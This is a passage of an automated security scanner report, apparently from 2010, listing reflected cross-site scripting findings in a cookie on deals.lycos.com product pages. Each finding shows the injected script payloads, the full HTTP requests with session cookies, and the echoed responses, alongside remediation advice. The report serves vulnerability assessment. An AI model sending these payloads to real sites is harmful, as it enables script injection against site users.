c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/panasonic-58-1080p-plasma-hdtv-1-100-414276",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adb343";alert(1)//3b16844b478"
});
</script>
...[SNIP]...

1.223. http://deals.lycos.com/deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50667"><script>alert(1)</script>3e46c174419 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A50667"><script>alert(1)</script>3e46c174419; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:36 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
tp://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A50667"><script>alert(1)</script>3e46c174419&amp;cj=1" alt="tracker" />
...[SNIP]...

1.224. http://deals.lycos.com/deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4eee"%3balert(1)//c42f28c6d4b was submitted in the diktfc cookie. This input was echoed as f4eee";alert(1)//c42f28c6d4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af4eee"%3balert(1)//c42f28c6d4b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:37 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af4eee";alert(1)//c42f28c6d4b"
});
</script>
...[SNIP]...

1.225. http://deals.lycos.com/deal/panasonic-dmc-zs6-12mp-camera-for-150-414700 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/panasonic-dmc-zs6-12mp-camera-for-150-414700

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8948a"%3balert(1)//0c42ac67901 was submitted in the diktfc cookie. This input was echoed as 8948a";alert(1)//0c42ac67901 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/panasonic-dmc-zs6-12mp-camera-for-150-414700 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8948a"%3balert(1)//0c42ac67901; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
cript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/panasonic-dmc-zs6-12mp-camera-for-150-414700",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8948a";alert(1)//0c42ac67901"
});
</script>
...[SNIP]...

1.226. http://deals.lycos.com/deal/panasonic-dmc-zs6-12mp-camera-for-150-414700 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/panasonic-dmc-zs6-12mp-camera-for-150-414700

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d553c"><script>alert(1)</script>99f8fa73005 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/panasonic-dmc-zs6-12mp-camera-for-150-414700 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad553c"><script>alert(1)</script>99f8fa73005; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ttp://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/panasonic-dmc-zs6-12mp-camera-for-150-414700&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad553c"><script>alert(1)</script>99f8fa73005&amp;cj=1" alt="tracker" />
...[SNIP]...

1.227. http://deals.lycos.com/deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d16e3"><script>alert(1)</script>e618ca21634 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad16e3"><script>alert(1)</script>e618ca21634; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
p://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad16e3"><script>alert(1)</script>e618ca21634&amp;cj=1" alt="tracker" />
...[SNIP]...

1.228. http://deals.lycos.com/deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3da3d"%3balert(1)//178fd7981ee was submitted in the diktfc cookie. This input was echoed as 3da3d";alert(1)//178fd7981ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3da3d"%3balert(1)//178fd7981ee; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:16 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ipt">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3da3d";alert(1)//178fd7981ee"
});
</script>
...[SNIP]...

1.229. http://deals.lycos.com/deal/samsung-32-720p-lcd-hdtv-for-330-414355 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/samsung-32-720p-lcd-hdtv-for-330-414355

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dea67"><script>alert(1)</script>5b7fd28b581 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/samsung-32-720p-lcd-hdtv-for-330-414355 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adea67"><script>alert(1)</script>5b7fd28b581; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:24 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
rc="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/samsung-32-720p-lcd-hdtv-for-330-414355&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adea67"><script>alert(1)</script>5b7fd28b581&amp;cj=1" alt="tracker" />
...[SNIP]...

1.230. http://deals.lycos.com/deal/samsung-32-720p-lcd-hdtv-for-330-414355 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/samsung-32-720p-lcd-hdtv-for-330-414355

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e5a9"%3balert(1)//21691b5acad was submitted in the diktfc cookie. This input was echoed as 6e5a9";alert(1)//21691b5acad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/samsung-32-720p-lcd-hdtv-for-330-414355 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6e5a9"%3balert(1)//21691b5acad; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:26 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/samsung-32-720p-lcd-hdtv-for-330-414355",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6e5a9";alert(1)//21691b5acad"
});
</script>
...[SNIP]...

1.231. http://deals.lycos.com/deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a2e5"><script>alert(1)</script>04a9fd962a5 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3a2e5"><script>alert(1)</script>04a9fd962a5; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:23 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
p://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3a2e5"><script>alert(1)</script>04a9fd962a5&amp;cj=1" alt="tracker" />
...[SNIP]...

1.232. http://deals.lycos.com/deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14597"%3balert(1)//71a486517fb was submitted in the diktfc cookie. This input was echoed as 14597";alert(1)//71a486517fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A14597"%3balert(1)//71a486517fb; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:24 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ipt">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A14597";alert(1)//71a486517fb"
});
</script>
...[SNIP]...

1.233. http://deals.lycos.com/deal/samsung-nx10-15mp-dslr-camera-lens-423-413374 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/samsung-nx10-15mp-dslr-camera-lens-423-413374

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31ce5"><script>alert(1)</script>570dcb9c64e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/samsung-nx10-15mp-dslr-camera-lens-423-413374 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A31ce5"><script>alert(1)</script>570dcb9c64e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
